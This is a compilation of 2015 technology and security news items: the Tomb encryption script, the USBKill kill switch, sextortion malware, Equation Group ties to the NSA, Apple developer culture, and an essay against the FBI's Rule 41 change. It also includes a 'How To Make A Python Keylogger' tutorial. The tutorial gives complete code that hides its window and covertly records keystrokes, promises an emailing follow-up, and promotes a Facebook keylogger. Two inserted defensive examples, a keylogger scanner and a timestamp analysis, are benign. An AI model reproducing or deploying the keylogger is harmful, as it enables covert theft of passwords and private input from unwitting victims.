Tomb, a Successor To TrueCrypt For Linux Geeks

Original Article 
from the tomb-is-a-nice-friendly-word dept.

jaromil writes:

Last day we released Tomb version 2.1 with improvements to stability, documentation and translations. Tomb is just a ZSh script wrapping around cryptsetup, gpg and other tools to facilitate the creation and management of LUKS encrypted volumes with features like key separation, steganography, off-line search, QRcode paper backups etc. In designing Tomb we struggle for minimalism and readability, convinced that the increasing complexity of personal technology is the root of many vulnerabilities the world is witnessing today — and this approach turns out to be very successful, judging from the wide adoption, appreciation and contributions our project has received especially after the demise of TrueCrypt.
As maintainer of the software I wonder what Slashdot readers think about what we are doing, how we are doing it and more in general about the need for simplicity in secure systems, a debate I perceive as transversal to many other GNU/Linux/BSD projects and their evolution. Given the increasing responsibility in maintaining such software, considering the human-interface side of things is an easy-to-reach surface of attack, I can certainly use some advice and criticism.

Posted by timothy 2 days ago

USBKill turns thumb drives into computer kill switches

original article 

A coder who goes by the online handle “Hephaestos” has shared with the world a Python script that, when put on a USB thumb drive, turns the device into an effective kill switch for the computer into which it’s plugged.


USBkill, as the programmer dubbed it, “waits for a change on your USB ports, then immediately kills your computer.”

The device would be useful “in case the police comes busting in, or steals your laptop from you when you are at a public library (as with Ross [Ulbricht]),” Hephaestos explained. 

Using a cord to attach the USB key to one’s wrist will ensure that the USB is removed instantly with a quick tug upon the arrest of the user or the seizure of the computer.

Of course, if the user doesn’t use full disk encryption in the first place, the device becomes useless.

Hephaestos says that USBkill is still in the early stages, but that it works, and works well.




Trend Micro: Hackers Using Android App For Sextortion   

 

Researchers found that the extortionists first lure their victims through a number of online chatting tools   
Saturday, March 28, 2015: Security software company Trend Micro has reported that criminals have developed advanced mobile applications and tools that siphon their victims’ online passwords and contacts to increase the chance that they will pay up.

In its latest report, ‘Sextortion in the Far East’, Trend Micro’s researchers detail a new Android app that criminals are using to blackmail their victims.

Sextortion is the act of coercing cybercrime victims to perform sexual favors or to pay large amounts of money in exchange for the non-exposure of their explicit images, videos, or conversations.

Cybercriminals lure, record, and threaten their victims online, and the scheme includes a mobile malware component. During their chat or Skype session, cybercriminals convince victims to install a data stealer or disguised Android malware that steals victim data off their device. Cybercriminals can then threaten their victims with the possibility of sending the explicit content to their victim’s contact list. The malware these cybercriminals use is persistent and exhibits various intrusive behaviors.

Researchers found that the extortionists first lure their victims through a number of online chatting tools. Once the trap is set, they feign audio or messaging problems to persuade their target to download one of four malicious Android apps. By following their email, social media and bank accounts, Trend Micro traced several of the Android app developers and their money go-betweens to China.

The company found evidence that the criminals opened different bank accounts for each extortion campaign, which typically lasted for a few weeks.

Sushma Rani, EFYTIMES News Network

How To Make A Python Keylogger

Posted by Ivan Blazevic in Articles, Programming, Python

This is a tutorial that explains how to make a simple keylogger that records keystroke activity on a PC and stores it in a .txt file. To make our keylogger we’ll use Python. Why Python? Python is a simple, powerful and flexible programming language. In my opinion it is the best; with a few lines of code you can do amazing things. If you have never used Python, read my previous article How To Create Your First Python Program, where I explained how to run a simple “Hello World” script.

To make programming easier, Python has “modules” that contain useful code that can extend Python’s functionality.
For the Python keylogger we’ll need to download the pywin32 and pyHook modules.

Step 1

Download and install pywin32 from this LINK 


Step 2

Download and install pyHook from this LINK

Step 3

Launch Python IDLE as Administrator and click on File -> New Window

Here is the complete keylogger code, described with comments:
Python Keylogger Code:

 

import win32api
import win32console
import win32gui
import pythoncom,pyHook
 
win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)
 
def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii !=0 or 8:
#open output.txt to read current keystrokes
f=open('c:\output.txt','r+')
buffer=f.read()
f.close()
#open output.txt to write current + new keystrokes
f=open('c:\output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer+=keylogs
f.write(buffer)
f.close()
# create a hook manager object
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()

In the new window, copy and paste the Python keylogger code and click on Run -> Run Module.

After this your keylogger will be launched and all keystroke activity will be stored in ‘c:\output.txt’. In the next tutorial we’ll extend the Python keylogger with functionality that sends “output.txt” to a specific email address. You can find the keylogger code on my GitHub account https://github.com/blaz1988/keylogger/blob/master/keylogger.py

If you’re looking for a more powerful keylogger, check out Facebook Keylogger
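From the defender's side, the script above leaves a recognisable static fingerprint: a pyHook keyboard hook combined with a console window hidden through `ShowWindow(win, 0)`. The following scanner is an added example, not part of the original tutorial; the indicator names, the `verdict` levels and the reduced sample input are assumptions made for illustration.

```python
import ast

# Constructed input: only the indicator lines of the tutorial's script,
# with the logging body removed. It is parsed, never executed.
SAMPLE = '''
import win32console, win32gui
import pythoncom, pyHook
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)
def OnKeyboardEvent(event):
    return True
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
'''

def scan_source(source):
    """Return the set of indicator names found in one Python source string."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = [a.name for a in node.names] + [getattr(node, "module", None) or ""]
            if any(n.split(".")[0].lower() == "pyhook" for n in names):
                found.add("imports_pyhook")
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            name, args = node.func.attr, node.args
            if name == "HookKeyboard":
                found.add("installs_keyboard_hook")
            elif name == "PumpMessages":
                found.add("message_loop")
            elif (name == "ShowWindow" and len(args) == 2
                  and isinstance(args[1], ast.Constant) and args[1].value == 0):
                found.add("hides_window")  # second argument 0 is SW_HIDE
        elif isinstance(node, ast.Assign):
            if any(isinstance(t, ast.Attribute) and t.attr in ("KeyDown", "KeyUp")
                   for t in node.targets):
                found.add("registers_key_callback")
    return found

def verdict(source):
    """'high' when a keyboard hook is combined with a hidden window."""
    hits = scan_source(source)
    hooked = {"installs_keyboard_hook", "registers_key_callback"} <= hits
    if hooked and "hides_window" in hits:
        return "high"
    return "review" if hooked or "imports_pyhook" in hits else "clean"
```

A keyboard hook alone only rates "review", since accessibility and hotkey tools install one legitimately; it is the hidden window alongside it that raises the score.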

PC Hacks Article

 

Developers and the Fear of Apple

from the think-different-except-about-us dept.

An anonymous reader writes: UI designer Eli Schiff has posted an article about the “climate of fear” surrounding Apple in the software development community. He points out how developers who express criticism in an informal setting often recant when their words are being recorded, and how even moderate public criticism is often prefaced by flattery and endorsements. 

Beyond that, the industry has learned that they can’t rely on Apple’s walled garden to make a profit. The opaque app review process, the race to the bottom on pricing, and Apple’s resistance to curation of the App Store are driving “independent app developers into larger organizations and venture-backed startups.” Apple is also known to cut contact with developers if they release for Android first. The “climate of fear” even affects journalists, who face not only stonewalling from Apple after negative reporting, but also a brigade of Apple fans and even other journalists trying to paint them as anti-Apple.

New Evidence Strengthens NSA Ties To Equation Group Malware

from the tax-funded-hacks dept.
An anonymous reader writes: When researchers from Kaspersky Lab presented the Equation Group espionage malware, many in the security community were convinced it was part of an NSA operation. Now, Kaspersky has released new evidence that only strengthens those suspicions. In a code sample, they found a string named BACKSNARF_AB25, which happens to be the name of a project in the NSA’s Tailored Access Operations. Further, when examining the metadata on the malware files, they found the modification timestamps were almost always consistent with an 8-5 workday in the UTC-3 or UTC-4 timezones, consistent with work based in the eastern United States. The authors also tended to work Monday through Friday, and not on the weekends, suggesting a large, organized development team. “Whereas before the sprawling Equation Drug platform was known to support 35 different modules, Kaspersky has recently unearthed evidence there are 115 separate plugins. The architecture resembles a mini operating system with kernel- and user-mode components alike.”

ORIGINAL ARTICLE
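The timestamp reasoning in the summary above can be reproduced as a small forensic calculation: score every whole-hour UTC offset by how many file timestamps land in a Monday-to-Friday working day. This is an added example, not Kaspersky's tooling; the 08:00-17:00 window, the function names and the sample timestamps are constructed assumptions.

```python
from datetime import datetime, timedelta

def workday_fraction(stamps_utc, offset_hours, start=8, end=17):
    """Fraction of timestamps falling Mon-Fri, start <= hour < end, at a UTC offset."""
    hits = 0
    for ts in stamps_utc:
        local = ts + timedelta(hours=offset_hours)
        if local.weekday() < 5 and start <= local.hour < end:
            hits += 1
    return hits / len(stamps_utc)

def best_offsets(stamps_utc, tolerance=0.0):
    """Score offsets UTC-12..UTC+14; return (best-fitting offsets, best score)."""
    scores = {off: workday_fraction(stamps_utc, off) for off in range(-12, 15)}
    top = max(scores.values())
    return sorted(o for o, s in scores.items() if top - s <= tolerance), top

def constructed_sample():
    """Constructed data: hourly timestamps 08:00-15:00 at UTC-4, Mon-Fri, two weeks,
    stored as naive UTC datetimes, plus two weekend outliers."""
    out = []
    monday = datetime(2015, 3, 2)
    for d in range(14):
        local_day = monday + timedelta(days=d)
        if local_day.weekday() >= 5:
            continue
        for hour in range(8, 16):
            out.append(local_day + timedelta(hours=hour + 4))  # local -> UTC
    out += [datetime(2015, 3, 7, 3), datetime(2015, 3, 14, 3)]  # weekend outliers
    return out

if __name__ == "__main__":
    offsets, score = best_offsets(constructed_sample())
    print("best offsets:", offsets, "workday fit: %.3f" % score)
```

Two adjacent offsets tie on this data because the activity does not fill the whole window, which is why such analysis yields a range of timezones rather than one; file timestamps are also easy to alter, so the result is supporting evidence only.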

FBI Seeks To Legally Hack You If You’re Connected To TOR Or a VPN

Law would allow law enforcement to search electronic data if target computer location has been hidden through Tor or VPN

Original Article

by NICOLE KARDELL | FEE | JANUARY 20, 2015

The FBI wants to search through your electronic life. You may think it’s a given that the government is in the business of collecting everyone’s personal data — Big Brother run amok in defiance of the Constitution. But under the limits of the Fourth Amendment, nothing it finds can be used to prosecute its targets. Now the FBI is taking steps to carry out broad searches and data collection under the color of authority, making all of us more vulnerable to “fishing expeditions.”

The investigative arm of the Department of Justice is attempting to short-circuit the legal checks of the Fourth Amendment by requesting a change in the Federal Rules of Criminal Procedure. These procedural rules dictate how law enforcement agencies must conduct criminal prosecutions, from investigation to trial. Any deviations from the rules can have serious consequences, including dismissal of a case. The specific rule the FBI is targeting outlines the terms for obtaining a search warrant.

It’s called Federal Rule 41(b), and the requested change would allow law enforcement to obtain a warrant to search electronic data without providing any specific details as long as the target computer location has been hidden through a technical tool like Tor or a virtual private network. It would also allow nonspecific search warrants where computers have been intentionally damaged (such as through botnets, but also through common malware and viruses) and are in five or more separate federal judicial districts. Furthermore, the provision would allow investigators to seize electronically stored information regardless of whether that information is stored inside or outside the court’s jurisdiction.

The change may sound like a technical tweak, but it is a big leap from current procedure. As it stands, Rule 41(b) only allows (with few exceptions) a court to issue a warrant for people or property within that court’s district. The federal rules impose this location limitation — along with requirements that the agent specifically identify the person and place to be searched, find probable cause, and meet other limiting factors — to reduce the impact an investigation could have on people’s right to privacy. Now the FBI is asking for the authority to hack into and search devices without identifying any of the essential whos, whats, wheres, or whys — giving the FBI the authority to search your computer, tablet, or smartphone even if you are in no way suspected of a crime.

All you have to do is cross the FBI’s virtual path. For instance, the proposed amendment would mean that agents could use tactics like creating online “watering holes” to attract their targets. Anyone who clicked on law enforcement’s false-front website would download the government malware and expose their electronic device to an agent’s search (and also expose the device to follow-on hackers). One obvious target for this strategy is any forum that attracts government skeptics and dissenters — FEE.org, for example. Such tactics could inadvertently impact thousands of people who aren’t investigation targets.

This sort of sweeping authority is in obvious conflict with the Constitution. The Fourth Amendment makes it clear that the government cannot legally search your house or your personal effects, including your electronic devices, without (1) probable cause of a suspected crime (2) defined in a legal document (generally, a search warrant issued by a judge) (3) that specifically identifies what is to be searched and what is to be seized.

The FBI is not the first government agency to find itself challenged by the plain language of the Fourth Amendment. Past overreach has required judges and Congress to clarify what constitutes a legal search and seizure in particular contexts. In the 1960s, when electronic eavesdropping (via wiretaps and bugs) came about, Congress established the Omnibus Crime Control and Safe Streets Act of 1968 (the Wiretap Act). The law addressed concerns about these new surreptitious and invasive investigative tactics and provided several strictures on legal searches via wiretap or bug. Since covert investigative tools can be hard to detect, it was important to institute more rigorous standards to keep agents in line.

The same concerns that Congress addressed in the 1960s are present today, but they take on far greater significance. With our growing reliance on electronic devices to communicate with others, to transact business, to shop, travel, date, and store the details of our private lives, these devices are becoming our most important personal effects. The ability of government actors to enter our digital space and search our electronic data is a major privacy concern that must be checked by Fourth Amendment standards. As the Supreme Court recently pronounced in Riley v. California, the search of a modern electronic device such as a smartphone or computer is more intrusive to privacy than even “the most exhaustive search of a house.”

What seems most troubling, though, is that the FBI is attempting to override the Fourth Amendment, along with the body of law developed over the years to rein in surveillance powers, through a relatively obscure forum. Instead of seeking congressional authority or judicial clarification, it has sought a major power grab through a procedural rule tweak — a tweak that would do away with jurisdictional limitations and specificity requirements, among other important checks on law enforcement. The request seems objectively — and constitutionally — offensive.